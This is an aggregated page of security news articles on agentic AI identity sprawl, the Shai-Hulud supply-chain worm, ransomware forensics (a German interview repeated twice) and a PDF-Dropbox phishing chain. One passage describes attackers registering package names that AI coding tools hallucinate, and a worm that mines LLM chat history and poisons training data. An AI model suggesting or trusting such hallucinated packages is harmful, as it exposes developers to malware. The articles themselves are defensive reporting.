For enterprise security teams, the incident underscores the need for comprehensive software inventories that include widely used utilities, cryptographic verification of all updates, and what Forrester described as a “shift from implicit trust to continuous verification.” The Forrester analysts also warned that AI agents could amplify similar risks. “The same supply chain blind spots that let a compromised tool blend into developer noise will let a compromised agent establish persistence and elevate privileges at scale,” they wrote. Organizations that cannot strictly define what should execute and communicate are “structurally conceding this class of attack.”
View the full article
- 0 comments
- 28 views
-
- 0 comments
- 43 views
-
Agentic use will vary by enterprise, but analysts, consultants, and security vendors agree that their numbers will expand far beyond CISOs’ ability to maintain control as they simultaneously navigate the price of decades of identity governance neglect for non-human identities (NHIs), including service accounts, OAuth tokens, embedded API keys, and automation credentials.
Ishraq Khan, CEO of coding productivity tool vendor Kodezi, sees most enterprises today housing 8 to 10 million such identities, a figure he projects will hit 20 to 50 million by year’s end.
Jason Sabin, CTO at DigiCert, predicts an even steeper rise, with enterprises’ identity role calls increasing 10 times by January 2027.
“We need to rethink how identity and data provisioning is done and put in place the right processes that can scale with the growth of agentic identities,” says Justin Greis, CEO of consulting firm Acceligence and former head of the North American cybersecurity practice at McKinsey. “You simply cannot apply human processes to something that will scale at this rate.”
Visibility is the bigger problem
As bad as that massively expanding identity universe is, the bigger problem may be how little visibility CISOs have into NHIs, with AI agents offering not just the fastest growth but the least visibility.
Jason Andersen, principal analyst for Moor Insights & Strategy, estimates 25% NHI visibility for enterprise CISOs today. “The remaining 75% is in the shadows,” he adds.
Those shadows include “semi-shadow” activities, such as third parties or lines of business that have been given permission to experiment with agentic AI but have not necessarily alerted IT or security teams about what they are doing.
Still, Andersen sees that number getting a lot worse, projecting visibility to drop to about 12% by year-end and then into the single digits by January 2028. “And then they’ll likely fix it,” he says, adding, “It’s a big frickin’ problem.”
Gartner analysts Jeremy D’Hoinne and Akif Khan agree CISOs face urgent problems in this area today.
NHIs are going to be “several orders of magnitude larger than human identities and most organizations do not have a strong enough foundation to manage both machine and agentic identities,” Gartner’s Khan says.
Enterprise CISOs are “blind to what is happening. The numbers are going to be overwhelming,” D’Hoinne adds.
Forrester expects similar outcomes for CISOs. “There is going to be an explosion of non-human identities,” says Forrester analyst Geoff Cairns. “The exponential growth is indisputable.”
Kodezi’s Khan notes that the lack of a robust base for NHI governance — now including agentic AI — is a critical problem.
“Enterprises never solved non-human authentication so we don’t have the systems in place for a good secure environment. At its core, we never had the right foundation. That means that we will never have that perfect inventory,” he explains.
Cost effective fix: Do nothing
Kodezi’s Khan offers an interesting fix for that foundational problem: Don’t even try.
He argues it’s a money pit that will never be fully resolved. Instead, he suggests pouring resources into creating a strict identity strategy for every NHI going forward.
“Aim for containment rather than for perfection. You can’t really govern every identity, but if you start now, you can govern future actions,” he says, adding that, over the years, the percentage of uncontrolled identities will slowly drop as millions more identities are added.
Nik Kale, principal engineer at Cisco and member of the Coalition for Secure AI (CoSAI) and ACM’s AI Security (AISec) program committee, agrees with that assessment. “If you are drowning, you don’t start by draining the ocean.”
“The ratios tell you why this is so ungovernable. These identities are growing much faster than the discovery capabilities,” Kale notes. “It becomes a math problem at that point.”
As for the path forward, Kale advises not to try to fix the legacy situation.
“You just have to contain it, segment it, assume it’s compromised and that it’s hostile territory,” he says. “The plan needs to be containment plus a clean slate going forward. Inventory all non-human identities. Identify which have standing versus just-in-time access. Assign ownership to every one of them. No product required — just a terrifying spreadsheet.”
Kale adds that cleaning IDs from now on will deliver a better benefit to CISOs. “In my opinion, the ratio matters less than the governance gap. Whether it’s 200:1 or 500:1, if IAM [identity access management] only manages 44% of them, the attack surface is already unmanageable,” he says.
But he stresses that NHIs — especially when agentic — can be particularly difficult to find, let alone control.
“Most organizations are undercounting by two to three times because machine identities are scattered across cloud consoles, repos, config files, and secrets managers that nobody’s aggregating,” Kale says. “Agentic AI is a multiplier, not an addition. Agents spawn subagents, create credentials dynamically, and establish agent-to-agent auth chains. One agent deployment can generate dozens of new machine identities.”
Sanchit Vir Gogia, chief analyst at Greyhound Research, sees a reckoning ahead.
“The enterprise control plane has quietly shifted from humans to machines, while governance stayed behind,” he says. “Once nonhuman identities outnumber humans by hundreds to one, identity stops being an administrative discipline and becomes the operating system of trust. The failure mode is not that there are too many identities; it is that enterprises cannot assert intent, ownership, and accountability for what those identities are doing at runtime.”
Moreover, the situation is intensifying thanks to today’s business environment.
“This is compounded by incentive structures that reward speed and uptime while penalizing breakage, which leads teams to overpermission machines by default,” Gogia says. “Overpermission is invisible until it is catastrophic. At that point, audits, roles, and reviews offer comfort but not control.”
Agentic didn’t start the fire
None of this situation was caused by agentic AI, Gogia underscores.
“Enterprises did not enter a machine identity crisis because of agentic AI. They entered it years ago through service accounts, embedded API keys, long lived tokens, and automation credentials that were created to keep systems moving and then quietly forgotten,” he says. “What agents change is velocity and reach. They inherit trust and then operationalize it at machine speed. A legacy identity that once represented a contained risk now becomes an execution layer across systems, vendors, and workflows.”
Gogia adds: “The most dangerous assumption in enterprise security today is that valid identity implies safe behavior. In machine-driven environments, credentials are often correct and activity is authorized, yet outcomes are harmful. Machines do not follow joiner-mover-lever models. They do not pause for approvals. They operate continuously and propagate actions automatically.”
As a result, decision-making agents, layered into operations, achieve a rate of action that “collapses the window for detection,” he says. “The failure shifts from prevention to detection lag. By the time humans understand what happened, the agent already did it.”
This should — and likely will — cause a rethinking from both enterprise CISOs and CIOs, he says.
“This moment tests leadership alignment. CIOs are under pressure to deploy agents for productivity and scale. CISOs are staring at accountability gaps, forensic complexity, and cascading blast radius. If these agendas diverge, the enterprise ends up with autonomy without responsibility. Boards will ask who owns an agent, who sets its boundaries, and who answers when it causes harm,” Gogia explains.
“The next phase of governance will require responsibility mapping for agents, separation of duties for high impact actions, and clear human checkpoints where judgment truly matters,” he adds. “Incident response must also evolve toward reconstructing chains of machine decisions, not just tracing logins.”
View the full article
- 0 comments
- 42 views
-
These risks include, for example, React2Shell, Shai-Hulud, and XZ Utils — all vulnerabilities in the software supply chain that started small and later had massive repercussions. Shai-Hulud stands out in particular, signaling the end of the “passive era” of supply chain attacks and the beginning of the “active worm” era. This shift promises devastating consequences for software pipelines.
Traditionally, supply chain attacks were passive traps. An attacker would upload a misspelled package (typosquatting), such as “reqeusts” instead of “requests,” sit back, and wait for a complacent developer to make a mistake. The blast radius was linear and rather slow.
Shai-Hulud changed the rules of the game by introducing a worm-like propagation method. Once it lands on a developer’s machine, it actively collects credentials (NPM tokens, GitHub secrets). It uses these stolen credentials to automatically publish infected versions of other legitimate packages managed by the victim. Unlike spyware, which aims to remain hidden, variants of Shai-Hulud include a “dead man switch.” If it detects that it is being blocked or analyzed, it attempts to wipe the victim’s system, completely erasing all traces of itself.
The goal is no longer just the application, but the developer’s identity and the automated CI/CD pipelines that implicitly trust them. What if the next iteration of Shai-Hulud affected other coding languages?
Programming languages as ticking time bombs
One example of this is Python, the language of AI and data science. The next evolutionary stage of the supply chain worm will likely not only steal AWS keys but also leverage the rise of AI coding assistants.
Security researchers are already observing “hallucination hijacking,” in which attackers register packets whose existence AI tools falsely predict. A worm like Shai-Hulud could infect a data scientist’s laptop, scan their local LLM chat history for private packet names, and automatically register malicious versions publicly. A worm in this ecosystem would not only crash a website but could also subtly poison financial models, alter medical research data, or insert backdoors into corporate AI training sets — damage that could potentially go undetected for years.
Other examples could involve the coding languages Java/JVM or Rust/Go; here too, the effects would be catastrophic.
The polyglot supply chain attack
The most frightening prospect, however, is the convergence of these threats in a polyglot supply chain attack. Currently, security teams operate in isolation. AppSec monitors the code, CloudSec monitors the cloud, NetworkSec monitors the perimeter. A polyglot attack is designed to seamlessly break through these silos.
This happens as follows: A worm infiltrates a frontend developer’s laptop via a low-level JavaScript dependency. It detects that the developer also has access to the company’s backend Rust repository, steals these credentials, and injects malicious build scripts into the Rust CI pipeline. The Rust pipeline then deploys a compromised binary to a Kubernetes cluster.
The attack could begin in NPM but end as a compiled binary backdoor in the production cloud infrastructure. The JavaScript security team won’t detect it because it immediately left their domain. The cloud security team would also miss the threat because it was delivered from a trusted CI pipeline using valid credentials. CISOs need to be aware of this and take appropriate precautions
Recommendations for CISOs
The EU Cyber Resilience Act (CRA) provides recommendations for CISOs. It mandates the protection of digital products for manufacturers, importers, and distributors, encouraging them to invest in secure design during development and maintenance. The requirements outlined therein must be implemented gradually by the end of 2027, and include the security of networked hardware and software through the handling of vulnerabilities and their publication or notification to the relevant authorities. Furthermore, the three aforementioned stakeholders must also document the components of the software in software bills of materials (SBOMs).
The NIS2 Directive, which has now entered into force, contains similar requirements for operators of critical infrastructure (KRITIS) to those stipulated in the NIS2 Implementation Act (NIS2UmsuCG) and the KRITIS Umbrella Act regarding products and suppliers. OpenKRITIS provides a worthwhile overview.
To protect themselves from Shai-Hulud and similar threats, CISOs and their teams should implement the following steps:
You must end the “implicit trust” in identities. In the scenarios described earlier involving Shai-Hulud, the problem was that CI/CD systems were too often blindly trusted. Therefore, CISOs should ensure their teams critically examine their pipeline security.
CI/CD systems must not automatically assume an activity is legitimate simply because it was signed with a valid developer token. Instead, they must prioritize identity protection. Attackers have already been observed specifically stealing credentials such as NPM tokens and GitHub secrets to automatically publish infected packages. Measures to protect these identities must therefore be given top priority.
Security silos should be broken down. Many security aspects still aren’t consolidated under a single, overarching management structure. Tools and departments dedicated to application security, infrastructure security, cloud security, network security, and many others create numerous islands within the vast sea of security strategy. They all need to collaborate more closely and be coordinated by the CISO.
A key risk is the previously described polyglot supply chain attack, which seamlessly transcends these silos. Therefore, CISOs must implement cross-departmental and cross-functional monitoring. To further illustrate the danger: An attack could begin with a JavaScript file, propagate through build scripts, and ultimately result in a backdoor in the cloud. Often, there’s no integrated visibility to track this entire process. The JavaScript team might lose sight of the attack once it leaves its sphere, while the cloud team relies on the CI pipeline.
CISOs must therefore establish systems that monitor the entire path from software development to build and all the way to runtime. SBOMs, which document all software used, provide a solution.
Prepare for active worms and ensure the protection of AI tools. To mitigate AI-driven risks, it’s crucial to prevent the hijacking and manipulation of AI tools. Numerous software developers rely on these tools to write their software. Security researchers are already observing attackers using packets that cause AI tools to hallucinate.
Active worms represent the next level of threat. Therefore, security strategies should extend beyond simply protecting against typos. Threats like Shai-Hulud spread exponentially, like a worm. At this speed, manual packet inspection processes are no longer sufficient.
This type of supply chain worm also features a “dead man switch” that wipes the victim’s system if an analysis is detected. CISOs should ensure that logs are secured even outside the developer’s machine to preserve traces of the attack for forensic investigations.
View the full article
- 0 comments
- 37 views
-
Montagmorgen, 8:00 Uhr. Die Mitarbeitenden können sich nicht einloggen. Die Produktionsbänder stehen still, und auf den Bildschirmen prangen digitale Erpresserschreiben. Der Albtraum eines jeden CIOs ist wahr geworden: Ein Ransomware-Angriff hat den Betrieb lahmgelegt. Jetzt endet der Regelbetrieb, und der Ausnahmezustand beginnt.
Für Joanna Lang-Recht, Director IT Forensics und Prokuristin bei der intersoft consulting services AG in Hamburg, ist dies der Alltag. Sie leitet eine hochspezialisierte Eingreiftruppe, die den Tathergang rekonstruiert und den Schaden eindämmt, während die anderen tief im Chaos versinken.
„Man kann sich das tatsächlich ähnlich vorstellen wie in der kriminalistischen Forensik“, erklärt Lang-Recht. Doch die Realität habe dann doch wenig mit grellen Taschenlampen in dunklen Räumen zu tun, auch wenn die Parallelen in der Vorgehensweise zu erkennen seien. „Wir sammeln keine Schmauchspuren oder Fußabdrücke, wie konzentrieren uns auf Spuren im digitalen Raum“, so die Forensikerin.
Wenn Cyberkriminelle zuschlagen, hinterlassen sie trotz aller Verschleierungstaktiken digitale Fragmente. Das können Logfiles sein, veränderte Zeitstempel oder Fragmente im Arbeitsspeicher. All das sind Puzzleteile, aus denen Lang-Recht und ihr Team das Bild des Angriffs zusammensetzen. Ihr Motto: Rekonstruieren statt Spekulieren. Doch bevor die detektivische Arbeit beginnen kann, müssen Unternehmen erst einmal aus der Schockstarre herausfinden.
Zwischen Panik und Paralyse
Ransomware-Angriffe folgen meist einem perfiden Timing. Beispielsweise wissen die Täter genau, wann IT-Abteilungen besonders verwundbar sind. „Häufig finden solche Angriffe über das Wochenende oder an Feiertagen statt“, berichtet die Expertin aus Hamburg in dem Podcast TechTalk Smart Leadership von COMPUTERWOCHE und CIO-Magazin. Die „Encryption-Phase“, in der die Daten des Opfers verschlüsselt werden, laufe dann von Freitag- bis Sonntagabend durch. Wenn die Belegschaft am Montag ins Büro kommt, sei das Unheil bereits geschehen.
Die erste Reaktion in den betroffenen Unternehmen beschreibt Lang-Recht als einen Zustand absoluter Panik. „Wir reden hier von einem wirklichen Ausnahmezustand“, betont sie. Keine E-Mails, kein Zugriff auf Kundendaten, keine Produktion. In diesem ersten „Stadium der Akzeptanz“, wie Lang-Recht es nennt, würden oft die größten Fehler gemacht, die eine spätere Aufklärung massiv erschweren könnten.
Der menschliche Impuls sei verständlich: Man möchte retten, was zu retten ist. Doch die Forensikerin warnt eindringlich vor Aktionismus. „Wir sehen häufig, dass IT-Teams gleich versuchen, zu bereinigen oder Backups einzuspielen, bevor sie überhaupt wissen, was passiert ist.“
Warum der Stecker nicht gezogen werden darf
Lang-Recht empfiehlt, die Systeme vom Internet zu trennen, aber nicht auszuschalten. Das Herunterfahren eines Servers könne einen „forensischen Suizid“ bedeuten. „Das vernichtet wertvolle Hinweise“, erklärt sie. Viele Angreifer hinterlassen demnach Spuren im RAM-Speicher. Wird der Strom gekappt, sind diese Informationen unwiederbringlich verloren. Die Daten sind aber essenziell, um zu verstehen, wie die Hacker sich im Netzwerk bewegt haben (Lateral Movement) und ob sie noch aktiv sind.
Die korrekte Vorgehensweise, so die Expertin, sei die Isolierung. „Die Verbindungen zu Dienstleistern, Kunden und Lieferanten sollten gekappt werden, um die Supply Chain nicht zu gefährden.“ Erst wenn die Infrastruktur in sich gesichert sei, beginne die eigentliche Arbeit der Forensik. Und diese erfordere oft das Auffahren schwerer Geschütze.
Die Dimension von Cyberangriffe sprenge nämlich nicht selten die verfügbaren Speicherkapazitäten vor Ort. Um forensische Images – exakte 1:1-Kopien der Datenträger – zu erstellen, müssen laut Lang-Recht riesige Datenmengen gesichert und analysiert werden. Sind aber hunderte Server und tausende Clients zu untersuchen, werden die Verantwortlichen an physikalische Grenzen stoßen.
Wer steckt hinter den Angriffen?
Das Bild vom einsamen Hacker im Hoodie, der zwischen Pizzaschachteln im Keller hockt, ist laut Joanna Lang-Recht unrealistisch. „Wir haben es mit hochprofessionellen Tätergruppen zu tun“, stellt sie klar. Die Cyberkriminalität hat sich industrialisiert. Das Geschäftsmodell „Ransomware-as-a-Service“ (RaaS) dominiert den Markt.
Die Gruppierungen seien wie mittelständische Betriebe aufgestellt. Sie verfügten oft sogar über Personalabteilungen, die Entwickler anwerben, und über Marketingabteilungen, die den Brand der Hackergruppe pflegten. Nicht selten hätten sie sogar einen mehrsprachigen Kundensupport installiert.
„Wenn man in die Verhandlung geht, hat man es tatsächlich teilweise mit einem First-Level- und einem Second-Level-Support zu tun“, sagt Lang-Recht. Es gebe Preislisten, Rabattaktionen und Ticket-Systeme.
Diese Professionalisierung mache die Angriffe effizient und besonders gefährlich, biete aber auch Ansatzpunkte für Verhandlungen. Für die Angreifer gehe es um ein Geschäft und nicht etwa um eine persönliche Vendetta. Das einzige Ziel ist der Profit. Doch genau hier entsteht oft ein moralisches Dilemma für die betroffenen Unternehmen: Zahlen oder nicht zahlen?
Das Dilemma der Lösegeldzahlung
Während Behörden wie das BSI empfehlen, grundsätzlich nicht zu zahlen, ist die Realität in den Vorstandsetagen eine andere: Wenn die Existenz des Unternehmens auf dem Spiel steht, wird die Moral zur Nebensache. „Es ist am Ende eine rein wirtschaftliche Entscheidung“, sagt sie nüchtern.
Geschäftsführern rät sie dringend davon ab, selbst in den Chat mit den Erpressern zu gehen. Hier seien Emotionen absolut fehl am Platz. Besser sei es, auf spezialisierte Unterhändler zu setzen. Ziel müsse sein, zunächst Zeit zu gewinnen, die Forderung zu drücken und herauszufinden, ob die Täter überhaupt in der Lage sind, die Daten wiederherzustellen.
Besonders ärgerlich aus Sicht des angegriffenen Unternehmens ist die sogenannte Double Extortion. Dabei verschlüsseln die Täter nicht nur die Daten, sondern sie drohen auch mit deren Veröffentlichung. Wenn sich also das Opfer weigert zu zahlen, erhöhen die Kriminellen den Druck und kündigen die Veröffentlichung sensibler Kundendaten oder Konstruktionspläne an.
Die Hausaufgaben für den C-Level
„Die Haupteinfallstore sind schwache Passwörter, die per Brute-Force geknackt werden, ungesicherte Fernwartungszugänge (VPN/RDP) und klassisches Phishing“, resümiert Lang-Recht. Versäumnisse in der „IT-Hygiene“ öffneten den Tätern Tür und Tor. Dazu zählen insbesondere veraltete Systeme, unzureichendes Patch-Management und eine fehlende Netzwerksegmentierung.
Wenn ein Angreifer einmal im Netz ist, sollte er sich nicht ungehindert bewegen können. In vielen Unternehmen seien die Netzwerke aber „flach“, so die Forensikerin, wer drin sei, komme überall hin. „Wenn ein Angreifer in einen Teilbereich eindringt, darf er nicht die gesamte Infrastruktur verschlüsseln können“, fordert Lang-Recht. Die Segmentierung des Netzwerks sei die wirksamste Maßnahme, um den Schaden zu begrenzen.
Der Faktor Mensch und Organisation
Technik ist aber nur die eine Seite der Medaille. Die Expertin betont, wie wichtig es sei, auf den Notfall vorbereitet zu sein. Ein Unternehmen muss wissen, an wen es sich im Notfall wendet. Verträge, die garantieren, dass bei einem Angriff ein Expertenteam bereitstehen, sind für sie unverzichtbar.
Zudem müssten Verantwortlichkeiten klar geregelt sein. In der Krise sei keine Zeit für Kompetenzgerangel. Wer entscheidet, ob der Internet-Zugang gekappt wird? Wer kommuniziert mit Kunden, Lieferanten und gegebenenfalls der Presse? Wer informiert den Datenschutzbeauftragten? „Es gibt in der Regel immer eine Person, die kommunikativ die Führung übernimmt“, beobachtet Lang-Recht. Diese Rolle müsse nicht nur definiert, sondern auch trainiert sein – durch Krisenstabsübungen und Notfallsimulationen.
Ein Wettrüsten mit KI
Der Blick in die Glaskugel zeigt keine Entspannung. Das Katz-und-Maus-Spiel zwischen Angreifern und Verteidigern geht nicht nur weiter, es wird durch den Einsatz von künstlicher Intelligenz auf ein höheres Niveau gehoben. Angreifer nutzen KI, um bessere Phishing-Mails zu schreiben und um Schwachstellen schneller zu finden. Verteidiger nutzen sie, um Anomalien im Netzwerkverkehr in Echtzeit zu erkennen.
Lang-Recht bleibt trotz der bedrohlichen Lage Optimistin. Hundertprozentige Sicherheit gibt es nicht, aber man könne es den Angreifern schwer machen. Sie empfiehlt: Investieren Sie in saubere Backups (offline!), Netzwerksegmentierung und Mitarbeiterschulung, und haben Sie einen Plan für den Tag X. (mb)
width="100%" height="152" frameborder="0" allowfullscreen allow="autoplay; clipboard-write; encrypted-media; fullscreen; picture-in-picture" loading="lazy" src="https://open.spotify.com/embed/episode/76glj1FbyI6DYwhk4Z8Nw8?utm_source=oembed"> View the full article
- 0 comments
- 28 views
-
Montagmorgen, 8:00 Uhr. Die Mitarbeitenden können sich nicht einloggen. Die Produktionsbänder stehen still, und auf den Bildschirmen prangen digitale Erpresserschreiben. Der Albtraum eines jeden CIOs ist wahr geworden: Ein Ransomware-Angriff hat den Betrieb lahmgelegt. Jetzt endet der Regelbetrieb, und der Ausnahmezustand beginnt.
Für Joanna Lang-Recht, Director IT Forensics und Prokuristin bei der intersoft consulting services AG in Hamburg, ist dies der Alltag. Sie leitet eine hochspezialisierte Eingreiftruppe, die den Tathergang rekonstruiert und den Schaden eindämmt, während die anderen tief im Chaos versinken.
„Man kann sich das tatsächlich ähnlich vorstellen wie in der kriminalistischen Forensik“, erklärt Lang-Recht. Doch die Realität habe dann doch wenig mit grellen Taschenlampen in dunklen Räumen zu tun, auch wenn die Parallelen in der Vorgehensweise zu erkennen seien. „Wir sammeln keine Schmauchspuren oder Fußabdrücke, wie konzentrieren uns auf Spuren im digitalen Raum“, so die Forensikerin.
Wenn Cyberkriminelle zuschlagen, hinterlassen sie trotz aller Verschleierungstaktiken digitale Fragmente. Das können Logfiles sein, veränderte Zeitstempel oder Fragmente im Arbeitsspeicher. All das sind Puzzleteile, aus denen Lang-Recht und ihr Team das Bild des Angriffs zusammensetzen. Ihr Motto: Rekonstruieren statt Spekulieren. Doch bevor die detektivische Arbeit beginnen kann, müssen Unternehmen erst einmal aus der Schockstarre herausfinden.
Zwischen Panik und Paralyse
Ransomware-Angriffe folgen meist einem perfiden Timing. Beispielsweise wissen die Täter genau, wann IT-Abteilungen besonders verwundbar sind. „Häufig finden solche Angriffe über das Wochenende oder an Feiertagen statt“, berichtet die Expertin aus Hamburg in dem Podcast TechTalk Smart Leadership von COMPUTERWOCHE und CIO-Magazin. Die „Encryption-Phase“, in der die Daten des Opfers verschlüsselt werden, laufe dann von Freitag- bis Sonntagabend durch. Wenn die Belegschaft am Montag ins Büro kommt, sei das Unheil bereits geschehen.
Die erste Reaktion in den betroffenen Unternehmen beschreibt Lang-Recht als einen Zustand absoluter Panik. „Wir reden hier von einem wirklichen Ausnahmezustand“, betont sie. Keine E-Mails, kein Zugriff auf Kundendaten, keine Produktion. In diesem ersten „Stadium der Akzeptanz“, wie Lang-Recht es nennt, würden oft die größten Fehler gemacht, die eine spätere Aufklärung massiv erschweren könnten.
Der menschliche Impuls sei verständlich: Man möchte retten, was zu retten ist. Doch die Forensikerin warnt eindringlich vor Aktionismus. „Wir sehen häufig, dass IT-Teams gleich versuchen, zu bereinigen oder Backups einzuspielen, bevor sie überhaupt wissen, was passiert ist.“
Warum der Stecker nicht gezogen werden darf
Lang-Recht empfiehlt, die Systeme vom Internet zu trennen, aber nicht auszuschalten. Das Herunterfahren eines Servers könne einen „forensischen Suizid“ bedeuten. „Das vernichtet wertvolle Hinweise“, erklärt sie. Viele Angreifer hinterlassen demnach Spuren im RAM-Speicher. Wird der Strom gekappt, sind diese Informationen unwiederbringlich verloren. Die Daten sind aber essenziell, um zu verstehen, wie die Hacker sich im Netzwerk bewegt haben (Lateral Movement) und ob sie noch aktiv sind.
Die korrekte Vorgehensweise, so die Expertin, sei die Isolierung. „Die Verbindungen zu Dienstleistern, Kunden und Lieferanten sollten gekappt werden, um die Supply Chain nicht zu gefährden.“ Erst wenn die Infrastruktur in sich gesichert sei, beginne die eigentliche Arbeit der Forensik. Und diese erfordere oft das Auffahren schwerer Geschütze.
Die Dimension von Cyberangriffe sprenge nämlich nicht selten die verfügbaren Speicherkapazitäten vor Ort. Um forensische Images – exakte 1:1-Kopien der Datenträger – zu erstellen, müssen laut Lang-Recht riesige Datenmengen gesichert und analysiert werden. Sind aber hunderte Server und tausende Clients zu untersuchen, werden die Verantwortlichen an physikalische Grenzen stoßen.
Wer steckt hinter den Angriffen?
Das Bild vom einsamen Hacker im Hoodie, der zwischen Pizzaschachteln im Keller hockt, ist laut Joanna Lang-Recht unrealistisch. „Wir haben es mit hochprofessionellen Tätergruppen zu tun“, stellt sie klar. Die Cyberkriminalität hat sich industrialisiert. Das Geschäftsmodell „Ransomware-as-a-Service“ (RaaS) dominiert den Markt.
Die Gruppierungen seien wie mittelständische Betriebe aufgestellt. Sie verfügten oft sogar über Personalabteilungen, die Entwickler anwerben, und über Marketingabteilungen, die den Brand der Hackergruppe pflegten. Nicht selten hätten sie sogar einen mehrsprachigen Kundensupport installiert.
„Wenn man in die Verhandlung geht, hat man es tatsächlich teilweise mit einem First-Level- und einem Second-Level-Support zu tun“, sagt Lang-Recht. Es gebe Preislisten, Rabattaktionen und Ticket-Systeme.
Diese Professionalisierung mache die Angriffe effizient und besonders gefährlich, biete aber auch Ansatzpunkte für Verhandlungen. Für die Angreifer gehe es um ein Geschäft und nicht etwa um eine persönliche Vendetta. Das einzige Ziel ist der Profit. Doch genau hier entsteht oft ein moralisches Dilemma für die betroffenen Unternehmen: Zahlen oder nicht zahlen?
Das Dilemma der Lösegeldzahlung
Während Behörden wie das BSI empfehlen, grundsätzlich nicht zu zahlen, ist die Realität in den Vorstandsetagen eine andere: Wenn die Existenz des Unternehmens auf dem Spiel steht, wird die Moral zur Nebensache. „Es ist am Ende eine rein wirtschaftliche Entscheidung“, sagt sie nüchtern.
Geschäftsführern rät sie dringend davon ab, selbst in den Chat mit den Erpressern zu gehen. Hier seien Emotionen absolut fehl am Platz. Besser sei es, auf spezialisierte Unterhändler zu setzen. Ziel müsse sein, zunächst Zeit zu gewinnen, die Forderung zu drücken und herauszufinden, ob die Täter überhaupt in der Lage sind, die Daten wiederherzustellen.
Besonders ärgerlich aus Sicht des angegriffenen Unternehmens ist die sogenannte Double Extortion. Dabei verschlüsseln die Täter nicht nur die Daten, sondern sie drohen auch mit deren Veröffentlichung. Wenn sich also das Opfer weigert zu zahlen, erhöhen die Kriminellen den Druck und kündigen die Veröffentlichung sensibler Kundendaten oder Konstruktionspläne an.
Die Hausaufgaben für den C-Level
„Die Haupteinfallstore sind schwache Passwörter, die per Brute-Force geknackt werden, ungesicherte Fernwartungszugänge (VPN/RDP) und klassisches Phishing“, resümiert Lang-Recht. Versäumnisse in der „IT-Hygiene“ öffneten den Tätern Tür und Tor. Dazu zählen insbesondere veraltete Systeme, unzureichendes Patch-Management und eine fehlende Netzwerksegmentierung.
Wenn ein Angreifer einmal im Netz ist, sollte er sich nicht ungehindert bewegen können. In vielen Unternehmen seien die Netzwerke aber „flach“, so die Forensikerin, wer drin sei, komme überall hin. „Wenn ein Angreifer in einen Teilbereich eindringt, darf er nicht die gesamte Infrastruktur verschlüsseln können“, fordert Lang-Recht. Die Segmentierung des Netzwerks sei die wirksamste Maßnahme, um den Schaden zu begrenzen.
Der Faktor Mensch und Organisation
Technik ist aber nur die eine Seite der Medaille. Die Expertin betont, wie wichtig es sei, auf den Notfall vorbereitet zu sein. Ein Unternehmen muss wissen, an wen es sich im Notfall wendet. Verträge, die garantieren, dass bei einem Angriff ein Expertenteam bereitstehen, sind für sie unverzichtbar.
Zudem müssten Verantwortlichkeiten klar geregelt sein. In der Krise sei keine Zeit für Kompetenzgerangel. Wer entscheidet, ob der Internet-Zugang gekappt wird? Wer kommuniziert mit Kunden, Lieferanten und gegebenenfalls der Presse? Wer informiert den Datenschutzbeauftragten? „Es gibt in der Regel immer eine Person, die kommunikativ die Führung übernimmt“, beobachtet Lang-Recht. Diese Rolle müsse nicht nur definiert, sondern auch trainiert sein – durch Krisenstabsübungen und Notfallsimulationen.
Ein Wettrüsten mit KI
Der Blick in die Glaskugel zeigt keine Entspannung. Das Katz-und-Maus-Spiel zwischen Angreifern und Verteidigern geht nicht nur weiter, es wird durch den Einsatz von künstlicher Intelligenz auf ein höheres Niveau gehoben. Angreifer nutzen KI, um bessere Phishing-Mails zu schreiben und um Schwachstellen schneller zu finden. Verteidiger nutzen sie, um Anomalien im Netzwerkverkehr in Echtzeit zu erkennen.
Lang-Recht bleibt trotz der bedrohlichen Lage Optimistin. Hundertprozentige Sicherheit gibt es nicht, aber man könne es den Angreifern schwer machen. Sie empfiehlt: Investieren Sie in saubere Backups (offline!), Netzwerksegmentierung und Mitarbeiterschulung, und haben Sie einen Plan für den Tag X. (mb)
width="100%" height="152" frameborder="0" allowfullscreen allow="autoplay; clipboard-write; encrypted-media; fullscreen; picture-in-picture" loading="lazy" src="https://open.spotify.com/embed/episode/76glj1FbyI6DYwhk4Z8Nw8?utm_source=oembed"> View the full article
- 0 comments
- 27 views
-
- 0 comments
- 55 views
-
- 0 comments
- 55 views
-
According to new research, attackers are still making mischief with PDFs, the old business standby, and are exploiting growing trust in services like Dropbox.
Forcepoint’s X-Labs team has uncovered a multi-stage phishing campaign that exploits PDF files and Dropbox storage through a layered redirection attack. After clicking on what looks like a legitimate PDF, victims are rerouted to a Dropbox logon impersonation page designed to harvest their credentials for internal access, account takeover, or other fraud.
“This is a perfect example of why phishing is still the number one way for criminals to get at organizations,” said David Shipley of Beauceron Security. “This attack works because it mimics normal business behavior.”
Anatomy of a multi-layered PDF attack
In this campaign, victims first receive a professional-sounding email that seems to be part of a normal procurement or tender process and asks them to review an attached document.
The type of wording is “commonly used in tender or procurement fraud, where urgency and legitimacy are deliberately created to encourage quick action,” wrote Forcepoint researcher Prashant Kumar.
The PDF serves as the primary malware delivery mechanism. Unbeknownst to the victim, the sender address is spoofed or associated with a compromised account. Once they click on the attachment, they are directed to a second PDF hosted on a trusted cloud service (public.blob[.]vercel-storage[.]com), which further redirects them to a fake Dropbox login page. If they take the bait, they’ll log in with their email address and password, and those credentials will be exfiltrated to attacker-controlled command and control (C2) infrastructure.
“The first [document] passed the email filter because it’s perfectly legitimate and links to a trusted service,” said Beauceron’s Shipley. “There’s no way to stop that without lots of negative business consequences.” The second one works because it’s not the trusted cloud service’s job to vet content hosted in it.
These types of email also often pass standard authentication checks such as sender policy framework (SPF), DomainKeys Identified Mail (DKIM), and domain-based message authentication, reporting, and conformance (DKIM).
“The minimal and business-like content helps avoid keyword-based detection, making the message look and feel more like a routine operational request,” Kumar wrote. Thus, attackers are able to convince victims that they need to authenticate to view the documents.
This phishing campaign is interesting in that it’s multi-faceted and has been “very well thought out,” noted Erik Avakian, technical counselor at Info-Tech Research Group. And it’s effective because “nothing looks obviously wrong to the end user at any single stage. The original email is clean and gets by most filters, the first PDF opens normally and seems to be hosted on a legitimate cloud service, and the Dropbox login page looks real.
“Each step, by itself, passes the sniff test,” he said. “The danger only becomes obvious when you zoom out and look at the entire chain, and most users don’t think about chains. They think in clicks.”
Masquerading as a safe document format
But after so many warnings about this over time — why are people still so trusting of PDFs and Dropbox?
“Because, historically, they’ve actually been trained to be,” said Avakian. PDFs are routinely used in the business world and have been positioned as a safe, read-only document format for invoices, contracts, HR forms, and statements. This applies to Dropbox, too; it’s become a mainstream business tool that employees have been encouraged to use, and has been positioned so that its services “are not some sketchy file-sharing site anymore.”
